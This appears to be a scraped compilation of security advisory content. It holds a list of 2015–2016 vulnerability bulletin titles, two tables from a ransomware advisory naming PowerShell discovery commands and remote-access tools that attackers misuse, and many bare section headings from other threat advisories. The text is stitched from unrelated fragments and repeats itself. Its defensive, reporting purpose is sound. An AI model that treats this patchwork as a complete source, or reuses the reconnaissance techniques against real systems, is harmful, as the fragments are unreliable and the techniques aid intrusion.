Multiple Vulnerabilities in Adobe Acrobat and Adobe Reader Could Allow for Remote Code Execution (APSB16-02)

Tue, 12 Jan 2016 05:00:00 +0000
...

Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS16-007)

Tue, 12 Jan 2016 05:00:00 +0000
...

Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (MS16-005)

Tue, 12 Jan 2016 05:00:00 +0000
...

A Vulnerability in VBScript Scripting Engine Could Allow for Remote Code Execution (MS16-003)

Tue, 12 Jan 2016 05:00:00 +0000
...

Cumulative Security Update for Microsoft Edge (MS16-002)

Tue, 12 Jan 2016 05:00:00 +0000
...

Cumulative Security Update for Internet Explorer (MS16-001)

Tue, 12 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Apple QuickTime Could Allow Arbitrary Code Execution

Fri, 08 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Google Android Could Allow for Remote Code Execution

Tue, 05 Jan 2016 05:00:00 +0000
...

Multiple Vulnerabilities in Adobe Flash Player and AIR Could Allow Remote Code Execution (APSB16-01)

Mon, 28 Dec 2015 05:00:00 +0000
...

Multiple vulnerabilities in Joomla Could Allow Arbitrary Code Execution

Wed, 23 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Juniper ScreenOS Could Allow Unauthorized, Remote Access or Remote Code Execution

Tue, 22 Dec 2015 05:00:00 +0000
...

Vulnerability in Apache Commons Collections Could Allow Arbitrary Code Execution

Tue, 22 Dec 2015 05:00:00 +0000
...

Vulnerability in FireEye Products Could Allow for Remote Code Execution

Thu, 17 Dec 2015 05:00:00 +0000
...

Vulnerability in Joomla Could Allow Remote Code Execution

Tue, 15 Dec 2015 05:00:00 +0000
...

Vulnerability in Cisco Products Could Allow Remote Code Execution

Tue, 15 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Apple Products Could Allow Remote Code Execution

Tue, 08 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Adobe Flash Player Could Allow Remote Code Execution (APSB15-32)

Tue, 08 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Windows Media Center Could Allow Remote Code Execution (MS15-134)

Tue, 08 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-131)

Tue, 08 Dec 2015 05:00:00 +0000
...

Vulnerability in Microsoft Uniscribe Could Allow Remote Code Execution (MS15-130)

Tue, 08 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Microsoft Silverlight Could Allow Remote Code Execution (MS15-129)

Tue, 08 Dec 2015 05:00:00 +0000
...

Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (MS15-128)

Tue, 08 Dec 2015 05:00:00 +0000
...

Vulnerability in Microsoft DNS Server Could Allow Remote Code Execution (MS15-127)

Tue, 08 Dec 2015 05:00:00 +0000
...

Cumulative Security Update for Microsoft Edge (MS15-125)

Tue, 08 Dec 2015 05:00:00 +0000
...

Cumulative Security Update for Internet Explorer (MS15-124)

Tue, 08 Dec 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Adobe Flash Player Could Allow for Remote Code Execution (APSB15-28)

Tue, 10 Nov 2015 05:00:00 +0000
...

Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-116)

Tue, 10 Nov 2015 05:00:00 +0000
...

Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS15-115)

Tue, 10 Nov 2015 05:00:00 +0000
...

Vulnerability in Microsoft Windows Journal Could Allow Remote Code Execution (MS15-114)

Tue, 10 Nov 2015 05:00:00 +0000
...

Cumulative Security Update for Microsoft Edge (MS15-113)

Tue, 10 Nov 2015 05:00:00 +0000
...

PowerShell Command	Description
WindowsIdentity.GetCurrent()	Returns a WindowsIdentity object that represents the current Windows user [T1033].
systeminfo	Displays detailed configuration information [T1082] about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties.
tasklist/svc	Lists unabridged service information [T1007] for each process currently running on the local computer.
Get-Service	Gets objects that represent the services [T1007] on a computer, including running and stopped services.
Get-PSDrive	Gets the drives [T1082] in the current session, such as: Windows logical drives on the computer, including drives mapped to network shares. Drives exposed by PowerShell providers. Session-specified temporary drives and persistent mapped network drives.
arp -a	Displays and modifies entries in the Address Resolution Protocol (ARP) cache table [T1016], which contains entries on the IPv4 and IPv6 addresses on host endpoints.

Tool Name	Description
AnyDesk	A common legitimate remote monitoring and management (RMM) tool maliciously used by Interlock actors to obtain remote access and maintain persistence. AnyDesk also supports remote file transfer.
Cobalt Strike	A penetration testing tool used by security professionals to test the security of networks and systems.
PowerShell	A cross-platform task automation solution made up of a command-line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
PSExec	A tool designed to run programs and execute commands on remote systems.
PuTTY.exe	An open source file transfer application commonly used to remotely connect to systems via Secure Shell (SSH). PuTTY also supports file transfer protocols like Secure File Transfer Protocol (SFTP) and Secure Copy Protocol (SCP).
ScreenConnect	A remote support, access, and meeting software that allows users to control devices remotely over the internet. CISA observed Interlock actors using a cracked version of this software in at least one incident. These versions may be standalone versions not connecting to ScreenConnect’s official cloud domains (domains available upon request from ConnectWise).
SystemBC	Enables Interlock actors to compromise systems, run commands, download malicious payloads, and act as a proxy tool to the actors’ C2 servers.
Windows Console Host	Windows Console Host (`conhost.exe`) manages the user interface for command-line applications in Windows, including Command Prompt and PowerShell.
WinSCP	A free and open source SSH File Transfer Protocol (FTP), WebDAV, Amazon S3, and secure copy protocol client.

CB Alerts

CISA and USCG Identify Areas for Cyber Hygiene Improvement After Conducting Proactive Threat Hunt at US Critical Infrastructure Organization

Summary

Technical Details

Overview

Key Findings

Shared Local Admin Accounts with Non-Unique Passwords Stored as Plaintext

Insufficient Network Segmentation Configuration Between IT and Operational Technology Environments

Insufficient Log Retention and Implementation

Additional Findings

Misconfigured sslFlags on a Production Server

#StopRansomware: Interlock

Summary

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Summary

Technical Details

Overview

File Execution

C2 Instructions

1. Opcode 0 – Steal Data Generic

2. Opcode 1 – Steal Browser Data

3. Opcode 2 – Steal Browser Data (Mozilla)

4. Opcode 3 – Download a File

5. Take Screenshot

6. Delete Self

Host Modifications

Decrypted Strings

Indicators of Compromise

Russian GRU Targeting Western Logistics Entities and Technology Companies

Executive Summary

Introduction

Description of Targets

Initial Access TTPs

Credential Guessing/Brute Force

Spearphishing

CVE Usage

Post-Compromise TTPs

Fast Flux: A National Security Threat

Executive summary

Technical details

Single and double flux

Additional malicious uses

Detection techniques

Mitigations

All organizations

Network defenders

Conclusion

Works cited

Technical Details

Background

Initial Access

Discovery

Defense Evasion

Lateral Movement and Execution

Exfiltration and Encryption

Extortion

Indicators of Compromise

MITRE ATT&CK Tactics and Techniques

#StopRansomware: Ghost (Cring) Ransomware

Summary

Technical Details

Initial Access

Execution

Persistence

Privilege Escalation

Credential Access

Defense Evasion

Discovery

Lateral Movement

Exfiltration

Command and Control

Impact and Encryption

Indicators of Compromise (IOC)

Ransom Email Addresses

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Summary

Technical Details

Exploit Chain 1

Lateral Movement

Exploit Chain 2

1. Opcode `0` – Steal Data Generic

2. Opcode `1` – Steal Browser Data

3. Opcode `2` – Steal Browser Data (Mozilla)

4. Opcode `3` – Download a File